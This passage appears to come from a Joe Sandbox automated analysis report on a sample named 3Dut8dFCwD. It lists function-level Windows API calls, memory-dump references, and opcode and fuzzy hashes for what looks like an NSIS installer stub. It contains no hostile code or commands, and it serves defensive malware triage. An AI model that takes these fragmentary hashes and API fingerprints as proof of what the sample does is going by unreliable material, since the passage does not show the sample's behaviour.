                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                              • String ID:
                              • API String ID: 2320649405-0
                              • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                              • Instruction ID: fafa423c3d5d8bdb364a41ac4aaa45114b780d6afda8d36e4a103189301150f1
                              • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                              • Instruction Fuzzy Hash: 242153B1500704ABCB359F39DD08A5B7BF8BF41714F14892EEB96A22E0D738E944CB54
                              APIs
                              • ReadFile.KERNEL32(?,?,?,?), ref: 0040275D
                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1
                                • Part of subcall function 00406105: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,?,?,004026D6,00000000,00000000,?,00000000,00000011), ref: 0040611B
                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: File$Pointer$ByteCharMultiWide$Read
                              • String ID: 9
                              • API String ID: 163830602-2366072709
                              • Opcode ID: 20294edbd6775d22b81a0ff36bbb0989563b2d3368df465689f6e0dcb3bf3618
                              • Instruction ID: ad829204a8421b16aaf2dc4ab9086753538d66bd122375994c0f550e7c4a5b44
                              • Opcode Fuzzy Hash: 20294edbd6775d22b81a0ff36bbb0989563b2d3368df465689f6e0dcb3bf3618
                              • Instruction Fuzzy Hash: 8551FA75D0411AABDF24DF94CA84AAEBBB9FF04344F10817BE941B62D0D7B49D82CB58
                              APIs
                              • lstrlenW.KERNEL32(007A0728,00000000,00798F00,759223A0,?,?,?,?,?,?,?,?,?,004033FA,00000000,?), ref: 004055F1
                              • lstrlenW.KERNEL32(004033FA,007A0728,00000000,00798F00,759223A0,?,?,?,?,?,?,?,?,?,004033FA,00000000), ref: 00405601
                              • lstrcatW.KERNEL32(007A0728,004033FA), ref: 00405614
                              • SetWindowTextW.USER32(007A0728,007A0728), ref: 00405626
                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040564C
                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405666
                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405674
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                              • String ID:
                              • API String ID: 2531174081-0
                              • Opcode ID: da048427165e3fda7d212e1d25adb62017d163fe0601bf1cc7e6f9066e197b12
                              • Instruction ID: 2aa9806f2f20795f51ccdab708f13b580d3c68b3f08286e5c277b3a8c7657607
                              • Opcode Fuzzy Hash: da048427165e3fda7d212e1d25adb62017d163fe0601bf1cc7e6f9066e197b12
                              • Instruction Fuzzy Hash: 9F21A175900518BACF119F65DD44ADFBFB9EF85354F10843AF904B22A0C7794A40CFA8
                              APIs
                              • CharNextW.USER32(?,*?|<>/":,00000000,007B3000,75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037F9,?,00000008,0000000A,0000000C), ref: 00406845
                              • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406854
                              • CharNextW.USER32(?,007B3000,75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037F9,?,00000008,0000000A,0000000C), ref: 00406859
                              • CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037F9,?,00000008,0000000A,0000000C), ref: 0040686C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: Char$Next$Prev
                              • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                              • API String ID: 589700163-1201062745
                              • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                              • Instruction ID: 1b09f5ceaf5ae9834212bd1c7625b2fa446eb07de75e5307cf61d1a9d5c412e4
                              • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                              • Instruction Fuzzy Hash: F411C46780221295DB303B54CC44AB7A2A8EF94790F52C43FED8A732C0E77C5C9286BD
                              APIs
                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E89
                              • GetMessagePos.USER32 ref: 00404E91
                              • ScreenToClient.USER32(?,?), ref: 00404EAB
                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EBD
                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EE3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: Message$Send$ClientScreen
                              • String ID: f
                              • API String ID: 41195575-1993550816
                              • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                              • Instruction ID: 5c8f3b82e3fec6324f9bbbe2439b20c808b00c1b0a410ced479a2b1fdaf2ea9b
                              • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                              • Instruction Fuzzy Hash: 58015E7290021DBADB00DB94DD85FFEBBBCAF95711F10412BBA51B61D0D7B49A018BA4
                              APIs
                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
                              • MulDiv.KERNEL32(000DB570,00000064,000DB574), ref: 00402FE1
                              • wsprintfW.USER32 ref: 00402FF1
                              • SetWindowTextW.USER32(?,?), ref: 00403001
                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013
                              Strings
                              • verifying installer: %d%%, xrefs: 00402FEB
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: Text$ItemTimerWindowwsprintf
                              • String ID: verifying installer: %d%%
                              • API String ID: 1451636040-82062127
                              • Opcode ID: c24f39b73ea1f3b51e5f33cc7d94247a9242632f843dd5f1d8eee7270cd10b93
                              • Instruction ID: ee21eaa8db301b2ce928a6645e07ba1980cadc5c51e80129ae912554bbca5152
                              • Opcode Fuzzy Hash: c24f39b73ea1f3b51e5f33cc7d94247a9242632f843dd5f1d8eee7270cd10b93
                              • Instruction Fuzzy Hash: 70014F7064020DBBEF209F60DE4AFAE3B79AB04344F108039FA12A51D0DBB99A559B58
                              APIs
                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
                              • GlobalFree.KERNEL32(?), ref: 00402A0B
                              • GlobalFree.KERNEL32(00000000), ref: 00402A1E
                              • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                              • String ID:
                              • API String ID: 2667972263-0
                              • Opcode ID: 0c0a4a72f1d98ed848e00ddbaa97379b691fc8b9e6fa1ea35c83bd1cba73d936
                              • Instruction ID: c874634495a4b446fb751942016c9e5cc597fe9d4aaee657827b690e02a6ad76
                              • Opcode Fuzzy Hash: 0c0a4a72f1d98ed848e00ddbaa97379b691fc8b9e6fa1ea35c83bd1cba73d936
                              • Instruction Fuzzy Hash: 0231AF71D00128ABCF21AFA5CE49D9E7EB9AF45324F10423AF551762E1CB794C419FA8
                              APIs
                              • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: CloseEnum$DeleteValue
                              • String ID:
                              • API String ID: 1354259210-0
                              • Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                              • Instruction ID: f4e9f9df98694428ddab884ff763f6d95bd8863eb2dee119fedf423c13c251a9
                              • Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                              • Instruction Fuzzy Hash: F4216B7150010ABFDF119F90CE89EEF7B7DEB54388F100076B949B11E0D7B49E54AA68
                              APIs
                              • GetDlgItem.USER32(?,?), ref: 00401D9F
                              • GetClientRect.USER32(?,?), ref: 00401DEA
                              • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
                              • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
                              • DeleteObject.GDI32(00000000), ref: 00401E3E
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                              • String ID:
                              • API String ID: 1849352358-0
                              • Opcode ID: de7853213b54b41e4d82286969a45229422243a67b8734ea48bfba129f49795d
                              • Instruction ID: 81d9f022906ee6244d37cab0c0f29790f3f95abc113fce67048acd2dff417476
                              • Opcode Fuzzy Hash: de7853213b54b41e4d82286969a45229422243a67b8734ea48bfba129f49795d
                              • Instruction Fuzzy Hash: 8B212672904119AFCB05DF98DE45AEEBBB5EB08300F14003AF945F62A0CB789D81DB98
                              APIs
                              • GetDC.USER32(?), ref: 00401E56
                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
                              • ReleaseDC.USER32(?,00000000), ref: 00401E89
                              • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED8
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: CapsCreateDeviceFontIndirectRelease
                              • String ID:
                              • API String ID: 3808545654-0
                              • Opcode ID: 12fc5c0feb0b51e7a773ba9164babbc76b3b82788c0ea370a0f868ab0e4caa48
                              • Instruction ID: ae55cc3b281789b51300203e9483e2b03caeed801d822a8147b49045e961ec64
                              • Opcode Fuzzy Hash: 12fc5c0feb0b51e7a773ba9164babbc76b3b82788c0ea370a0f868ab0e4caa48
                              • Instruction Fuzzy Hash: F4017571954240EFEB015BB4AE99ADD3FB4AF15301F10497AF141B61E2CAB904449B2C
                              APIs
                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: MessageSend$Timeout
                              • String ID: !
                              • API String ID: 1777923405-2657877971
                              • Opcode ID: c2490f809f288260d3854a97f2c9280dc6f84d52f63112501a652163611abe32
                              • Instruction ID: 5d336d63bea0f4dd646979e45c63d0f3d2888182fff20de36e63ae33d1796f08
                              • Opcode Fuzzy Hash: c2490f809f288260d3854a97f2c9280dc6f84d52f63112501a652163611abe32
                              • Instruction Fuzzy Hash: 2A21AD71D1421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941CB98
                              APIs
                              • lstrlenW.KERNEL32(007A1748,007A1748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E01
                              • wsprintfW.USER32 ref: 00404E0A
                              • SetDlgItemTextW.USER32(?,007A1748), ref: 00404E1D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: ItemTextlstrlenwsprintf
                              • String ID: %u.%u%s%s
                              • API String ID: 3540041739-3551169577
                              • Opcode ID: 21d04326a64a20976fb5de8d07180004ad871368d5848da8d0db5094891019e4
                              • Instruction ID: a0af56433f9d431f5046a9fb23145e7ed032e621b14740f85a591f17ba678af7
                              • Opcode Fuzzy Hash: 21d04326a64a20976fb5de8d07180004ad871368d5848da8d0db5094891019e4
                              • Instruction Fuzzy Hash: 6211E773A041283BDB1055ADEC45EAE369CDF86334F254237FA25F21D1EA78CC2182E8
                              APIs
                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037F9,?,00000008,0000000A,0000000C), ref: 00405E09
                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037F9,?,00000008,0000000A,0000000C), ref: 00405E13
                              • lstrcatW.KERNEL32(?,0040A014), ref: 00405E25
                              Strings
                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E03
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: CharPrevlstrcatlstrlen
                              • String ID: C:\Users\user\AppData\Local\Temp\
                              • API String ID: 2659869361-823278215
                              • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                              • Instruction ID: 4e7d22dde89eb6c6e58e9bdf2ba0d87ed645a023497c505cae90b6f2f3d33009
                              • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                              • Instruction Fuzzy Hash: E4D05E31101534AAC211AB48AC04CDB62ACAF46308342403AF541B60A9D7785A5186ED
                              APIs
                              • DestroyWindow.USER32(00000000,00000000,004031FC,00000001), ref: 00403031
                              • GetTickCount.KERNEL32 ref: 0040304F
                              • CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 0040306C
                              • ShowWindow.USER32(00000000,00000005), ref: 0040307A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
